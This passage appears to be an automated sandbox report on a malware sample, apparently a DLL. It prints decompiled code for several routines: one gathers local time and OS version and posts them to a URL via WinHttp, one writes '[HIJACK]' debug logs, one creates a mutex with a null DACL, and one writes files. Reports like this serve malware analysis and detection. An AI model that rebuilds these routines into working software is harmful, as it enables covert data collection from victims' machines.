                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t118 =  *((intOrPtr*)(_t110 - 0x2c)) - 6;
                                                                                                                                                                  					if( *((intOrPtr*)(_t110 - 0x2c)) <= 6) {
                                                                                                                                                                  						L2:
                                                                                                                                                                  						E100011C0(_t110 - 0x80, 0x10025cba);
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xe8)) = E10022710(__ebx, __edi, __esi, _t118, _t110 - 0xbc,  *((intOrPtr*)(_t110 - 0x2c)));
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xec)) =  *((intOrPtr*)(_t110 - 0xe8));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 5;
                                                                                                                                                                  						E10001A70(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xec)));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 4;
                                                                                                                                                                  						E100011A0(_t110 - 0xbc);
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xf0)) = E10001160(_t110 - 0xd8, _t118,  *((intOrPtr*)(_t110 + 0xc)));
                                                                                                                                                                  						 *((intOrPtr*)(_t110 - 0xf4)) =  *((intOrPtr*)(_t110 - 0xf0));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 6;
                                                                                                                                                                  						E10001A90(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xf4)));
                                                                                                                                                                  						 *((char*)(_t110 - 4)) = 4;
                                                                                                                                                                  						E100011A0(_t110 - 0xd8);
                                                                                                                                                                  						_push(E100011E0(_t110 - 0x80));
                                                                                                                                                                  						_push(0x61);
                                                                                                                                                                  						_push("post_info");
                                                                                                                                                                  						E1001F230(__edi, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
                                                                                                                                                                  						E100011C0(_t110 - 0x28, 0x10025cbb);
                                                                                                                                                                  						E100011C0(_t110 - 0x48, 0x10025cce);
                                                                                                                                                                  						_t72 = E10001200(_t110 - 0x64);
                                                                                                                                                                  						_t73 = E100011E0(_t110 - 0x64);
                                                                                                                                                                  						E10021C30(__ebx, __edi, __esi, _t118, 0, 0, 0, E100011E0(_t110 - 0x80), 2, 1, 0, _t73, _t72, 0, 0, 0, 0, 0, 0, _t110 - 0x28, _t110 - 0x48); // executed
                                                                                                                                                                  						_t112 = _t112 + 0x60;
                                                                                                                                                                  						_t76 = E10001200(_t110 - 0x28);
                                                                                                                                                                  						_t119 = _t76;
                                                                                                                                                                  						if(_t76 == 0) {
                                                                                                                                                                  							L4:
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					L5:
                                                                                                                                                                  					_push( *((intOrPtr*)(_t110 - 0x84)));
                                                                                                                                                                  					E1000CA40(_t77, _t108, _t109, _t119);
                                                                                                                                                                  					E10001110( *((intOrPtr*)(_t110 + 8)), _t119, _t110 - 0x48);
                                                                                                                                                                  					 *(_t110 - 0xdc) =  *(_t110 - 0xdc) | 0x00000001;
                                                                                                                                                                  					 *((char*)(_t110 - 4)) = 3;
                                                                                                                                                                  					E100011A0(_t110 - 0x48);
                                                                                                                                                                  					 *((char*)(_t110 - 4)) = 1;
                                                                                                                                                                  					E100011A0(_t110 - 0x28);
                                                                                                                                                                  					 *((char*)(_t110 - 4)) = 0;
                                                                                                                                                                  					E100011A0(_t110 - 0x64);
                                                                                                                                                                  					 *((intOrPtr*)(_t110 - 4)) = 0xffffffff;
                                                                                                                                                                  					E100011A0(_t110 - 0x80);
                                                                                                                                                                  					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
                                                                                                                                                                  					return  *((intOrPtr*)(_t110 + 8));
                                                                                                                                                                  					L6:
                                                                                                                                                                  				}
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Http_memset$DebugFileFindLocalNameOpenOptionOutputPathStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$[HIJACK][%s][%s][%d]: url = %s$post_info
                                                                                                                                                                  • API String ID: 4078257140-115957201
                                                                                                                                                                  • Opcode ID: 2e5c64d8afcfb9ddf15bb862174beeccd90e78952ebceb7d9c30a92996c6efd8
                                                                                                                                                                  • Instruction ID: 4cd3f4f778056951b5cfd2b5c12ca28e1b0ee278467a54424c11d59ecdb1d103
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e5c64d8afcfb9ddf15bb862174beeccd90e78952ebceb7d9c30a92996c6efd8
                                                                                                                                                                  • Instruction Fuzzy Hash: C1413D75D11248ABEB18DB94CC92FEDBB74EF18384F5080A8F60A77195EB302A45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E1001A7A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v279;
                                                                                                                                                                  				char _v280;
                                                                                                                                                                  				intOrPtr _v284;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				signed int _v316;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t27;
                                                                                                                                                                  				intOrPtr _t52;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  
                                                                                                                                                                  				_t51 = __esi;
                                                                                                                                                                  				_t50 = __edi;
                                                                                                                                                                  				_t37 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E10023171);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t52;
                                                                                                                                                                  				_v316 = 0;
                                                                                                                                                                  				E10001160( &_v312, __eflags, 0x10025c8f);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v280 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v279, 0, 0x103);
                                                                                                                                                                  				E1001DC60(__ebx, _t50, __esi,  &_v280); // executed
                                                                                                                                                                  				_t46 =  &_v280;
                                                                                                                                                                  				_t27 = E1000CAD0( &_v280);
                                                                                                                                                                  				_t55 = _t52 - 0x12c + 0x10;
                                                                                                                                                                  				_t59 = _t27;
                                                                                                                                                                  				if(_t27 == 0) {
                                                                                                                                                                  					E1000D903( &_v280,  &_v280, 0x104, "unknown err");
                                                                                                                                                                  					_t55 = _t55 + 0xc;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v284 = E1001A4E0(_t37, _t46, _t50, _t51, _t59,  &_v280);
                                                                                                                                                                  				E100011C0( &_v312, _v284);
                                                                                                                                                                  				_push(_v284);
                                                                                                                                                                  				E1000CA40(_t37, _t50, _t51, _t59);
                                                                                                                                                                  				E10001110(_a4, _t59,  &_v312);
                                                                                                                                                                  				_v316 = _v316 | 0x00000001;
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				E100011A0( &_v312);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}















                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A7F4
                                                                                                                                                                    • Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DC88
                                                                                                                                                                    • Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCA5
                                                                                                                                                                    • Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCBB
                                                                                                                                                                    • Part of subcall function 1001DC60: GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
                                                                                                                                                                    • Part of subcall function 1001DC60: _strcpy_s.LIBCMT ref: 1001DE09
                                                                                                                                                                  • _strlen.LIBCMT ref: 1001A80F
                                                                                                                                                                  • _strcpy_s.LIBCMT ref: 1001A82C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                                  • String ID: unknown err
                                                                                                                                                                  • API String ID: 3541540748-813478822
                                                                                                                                                                  • Opcode ID: efac7168300570dca757fc9347812aa854d67acda7d2ffe497c1877d970e4793
                                                                                                                                                                  • Instruction ID: 3aebd5af5d9b05859a12e4e17c573b0f64c0ee580e65f946a6305cb29b00d5b6
                                                                                                                                                                  • Opcode Fuzzy Hash: efac7168300570dca757fc9347812aa854d67acda7d2ffe497c1877d970e4793
                                                                                                                                                                  • Instruction Fuzzy Hash: A6217CB5C0021CABDB28DB64DD82BD9B774EB04750F4041E8B609A7285EB74BB84CF92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: O}B
                                                                                                                                                                  • API String ID: 0-2261005544
                                                                                                                                                                  • Opcode ID: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                                  • Instruction ID: e43efc7cca98cce1374ca7afc4db8c379560fc5196792797f74943b4e309f07b
                                                                                                                                                                  • Opcode Fuzzy Hash: 111f43c56742ec638a572f82f5ca4ec6e7bdecaa892b65ee4401de1ac2a03f5a
                                                                                                                                                                  • Instruction Fuzzy Hash: CC612CB4F04219EFCB04CF94D885AAEBBB1BF48314F108199EA05AB381D774A941CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A150(CHAR* _a4) {
                                                                                                                                                                  				struct _SECURITY_DESCRIPTOR _v24;
                                                                                                                                                                  				int _v28;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES _v40;
                                                                                                                                                                  				int _v44;
                                                                                                                                                                  				void* _t19;
                                                                                                                                                                  
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				InitializeSecurityDescriptor( &_v24, 1);
                                                                                                                                                                  				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
                                                                                                                                                                  				_v40.nLength = 0xc;
                                                                                                                                                                  				_v40.bInheritHandle = 1;
                                                                                                                                                                  				_v40.lpSecurityDescriptor =  &_v24;
                                                                                                                                                                  				_t19 = CreateMutexA( &_v40, 0, _a4); // executed
                                                                                                                                                                  				_v28 = _t19;
                                                                                                                                                                  				if(_v28 != 0 && GetLastError() == 0xb7) {
                                                                                                                                                                  					_v44 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v44;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A16A
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A17A
                                                                                                                                                                  • CreateMutexA.KERNELBASE(0000000C,00000000,100206C4), ref: 1001A19E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 1001A1AD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4085719312-0
                                                                                                                                                                  • Opcode ID: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction ID: 3bb7ca3d3a89cab5a40ee6ca153f8139473754825ab1ab767a0ca4e665a0d5f7
                                                                                                                                                                  • Opcode Fuzzy Hash: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
                                                                                                                                                                  • Instruction Fuzzy Hash: EC01BB71940309DFEB10DFD0C989BEDBBB4EB08315F600504EA05BA290D7B5AAC5CBA6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 004283DA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                  • String ID: $@
                                                                                                                                                                  • API String ID: 544645111-1077428164
                                                                                                                                                                  • Opcode ID: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                  • Instruction ID: 23d1629cc5a139e14551ecf931a83ce50547ed0f6d52aeabc839bd905d874c73
                                                                                                                                                                  • Opcode Fuzzy Hash: f624bd3e15cca0fcb456706e8e4389966f128c157dc993db58a64aaca4871b9e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7551F874A01619DFDB08CF88D490BEDBBF1BB88314F148259D805AB390C735A981CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1000CEBD(void* __edx) {
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				intOrPtr _t1;
                                                                                                                                                                  				void* _t2;
                                                                                                                                                                  				void* _t6;
                                                                                                                                                                  				void* _t10;
                                                                                                                                                                  				void* _t12;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				void* _t20;
                                                                                                                                                                  				void* _t22;
                                                                                                                                                                  				intOrPtr _t24;
                                                                                                                                                                  				void* _t28;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				void* _t32;
                                                                                                                                                                  
                                                                                                                                                                  				_t18 = __edx;
                                                                                                                                                                  				_t12 = HeapAlloc;
                                                                                                                                                                  				do {
                                                                                                                                                                  					_t32 =  *0x10335310; // 0x2c90000
                                                                                                                                                                  					_t20 = _t30;
                                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                                  						E10011F42(_t12, _t18, _t20, _t32);
                                                                                                                                                                  						E10011DA2(0x1e);
                                                                                                                                                                  						E10011B04(0xff);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t1 =  *0x10337f3c;
                                                                                                                                                                  					if(_t1 != 1) {
                                                                                                                                                                  						__eflags = _t1 - 3;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							L10:
                                                                                                                                                                  							__eflags = _t30;
                                                                                                                                                                  							if(_t30 == 0) {
                                                                                                                                                                  								_t20 = 1;
                                                                                                                                                                  								__eflags = 1;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t22 = _t20 + 0x0000000f & 0xfffffff0;
                                                                                                                                                                  							__eflags = _t22;
                                                                                                                                                                  							_push(_t22);
                                                                                                                                                                  							goto L13;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push(_t30);
                                                                                                                                                                  							_t2 = E1000CE60(_t12, _t20, 0, __eflags);
                                                                                                                                                                  							__eflags = _t2;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						if(_t30 == 0) {
                                                                                                                                                                  							_t10 = 1;
                                                                                                                                                                  							__eflags = 1;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t10 = _t30;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_t10);
                                                                                                                                                                  						L13:
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_t2 = RtlAllocateHeap( *0x10335310); // executed
                                                                                                                                                                  					}
                                                                                                                                                                  					_t28 = _t2;
                                                                                                                                                                  					if(_t28 == 0) {
                                                                                                                                                                  						_t24 = 0xc;
                                                                                                                                                                  						if( *0x103357e4 == _t2) {
                                                                                                                                                                  							 *((intOrPtr*)(E1000F780(__eflags))) = _t24;
                                                                                                                                                                  							L19:
                                                                                                                                                                  							 *((intOrPtr*)(E1000F780(_t37))) = _t24;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							goto L16;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t28;
                                                                                                                                                                  					L16:
                                                                                                                                                                  					_t6 = E1001092A(_t30);
                                                                                                                                                                  					_t37 = _t6;
                                                                                                                                                                  				} while (_t6 != 0);
                                                                                                                                                                  				goto L19;
                                                                                                                                                                  			}



















                                                                                                                                                                  APIs
                                                                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 1000CED2
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F69
                                                                                                                                                                    • Part of subcall function 10011F42: __NMSG_WRITE.LIBCMT ref: 10011F73
                                                                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 1000CED9
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E0E
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E1F
                                                                                                                                                                    • Part of subcall function 10011DA2: GetModuleFileNameA.KERNEL32(00000000,103354E9,00000104,?,103352E0,00000000), ref: 10011E3B
                                                                                                                                                                    • Part of subcall function 10011DA2: _strcpy_s.LIBCMT ref: 10011E50
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011E63
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E6C
                                                                                                                                                                    • Part of subcall function 10011DA2: _strlen.LIBCMT ref: 10011E79
                                                                                                                                                                    • Part of subcall function 10011DA2: __invoke_watson.LIBCMT ref: 10011EA6
                                                                                                                                                                    • Part of subcall function 10011B04: ___crtCorExitProcess.LIBCMT ref: 10011B08
                                                                                                                                                                    • Part of subcall function 10011B04: ExitProcess.KERNEL32 ref: 10011B12
                                                                                                                                                                    • Part of subcall function 1000CE60: ___sbh_alloc_block.LIBCMT ref: 1000CE88
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 1000CF27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __invoke_watson$ExitProcess_strcpy_s_strlen$AllocateFileHeapModuleName___crt___sbh_alloc_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3791426274-0
                                                                                                                                                                  • Opcode ID: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction ID: e2b4030b7ffdff5dfd6972142c91b8fd57cf3792c5bc4284219116a52f4c6e3d
                                                                                                                                                                  • Opcode Fuzzy Hash: cde093680f6c0b126d7258c0ccc5fda5382228ab6452671c1bcb805c8c46bad4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17012B3664936F5AF221D3699C81D7A72DDDB847F0B220036F908CA19ACA60DC419192
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001FC70(CHAR* _a4, void* _a8, long _a12) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				long _v12;
                                                                                                                                                                  				struct _OVERLAPPED* _v16;
                                                                                                                                                                  				void* _t12;
                                                                                                                                                                  				int _t14;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_t12 = CreateFileA(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                                                                                                                                                                  				_v8 = _t12;
                                                                                                                                                                  				_t14 = WriteFile(_v8, _a8, _a12,  &_v12, 0); // executed
                                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                                  					_v16 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				CloseHandle(_v8);
                                                                                                                                                                  				return _v16;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileA.KERNELBASE(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
                                                                                                                                                                  • WriteFile.KERNELBASE(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
                                                                                                                                                                  • CloseHandle.KERNEL32(00039E00), ref: 1001FCC3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1065093856-0
                                                                                                                                                                  • Opcode ID: ad2f09d0c760640d3f087f917110d740d93e78ee16150dd3c08881fe94400f9c
                                                                                                                                                                  • Instruction ID: 2f4003bc1fe89f611cd7e8d3edbfbe9cee40d04c14368eec4aa65be71e9b4f80
                                                                                                                                                                  • Opcode Fuzzy Hash: ad2f09d0c760640d3f087f917110d740d93e78ee16150dd3c08881fe94400f9c
                                                                                                                                                                  • Instruction Fuzzy Hash: 57F0BD75A40208FBEB10DFD4DD85F9E77B8EB48704F208148FA14AB280DA75AA559B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001F220() {
                                                                                                                                                                  				int _t1;
                                                                                                                                                                  
                                                                                                                                                                  				_t1 = PathFileExistsA("C:\\hijack"); // executed
                                                                                                                                                                  				return _t1;
                                                                                                                                                                  			}





                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(C:\hijack,?,1001F242,?,10022D49,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F228
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                  • String ID: C:\hijack
                                                                                                                                                                  • API String ID: 1174141254-148195797
                                                                                                                                                                  • Opcode ID: b4aed7142bcfa9c109a42f7cfcdeef266ad65f9a5a7ad023a92b352b605b1dd6
                                                                                                                                                                  • Instruction ID: 836d1940dc60a67217bc81a4f11f7de2e89defe1122ff9dd96729f1ae93068f2
                                                                                                                                                                  • Opcode Fuzzy Hash: b4aed7142bcfa9c109a42f7cfcdeef266ad65f9a5a7ad023a92b352b605b1dd6
                                                                                                                                                                  • Instruction Fuzzy Hash: BBA022382C020CA3800023CABC088E0BB3CC8880323820020FA0C020008F0220A000A3
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001F230(void* __edi, intOrPtr _a4, char _a8) {
                                                                                                                                                                  				char* _v8;
                                                                                                                                                                  				char _v70491;
                                                                                                                                                                  				char _v70492;
                                                                                                                                                                  				void* _t12;
                                                                                                                                                                  				void* _t16;
                                                                                                                                                                  
                                                                                                                                                                  				E10018B00(0x11358); // executed
                                                                                                                                                                  				_t12 = E1001F220(); // executed
                                                                                                                                                                  				if(_t12 != 0) {
                                                                                                                                                                  					_v70492 = 0;
                                                                                                                                                                  					E1000CF80(__edi,  &_v70491, 0, 0x1134f);
                                                                                                                                                                  					_v8 =  &_a8;
                                                                                                                                                                  					_t16 = E10001D60( &_v70492, 0x1134f, _a4, _v8);
                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                  					OutputDebugStringA( &_v70492);
                                                                                                                                                                  					return _t16;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t12;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 1001F220: PathFileExistsA.KERNELBASE(C:\hijack,?,1001F242,?,10022D49,[HIJACK][%s][%s][%d]: data = %s,00000000), ref: 1001F228
                                                                                                                                                                  • _memset.LIBCMT ref: 1001F25B
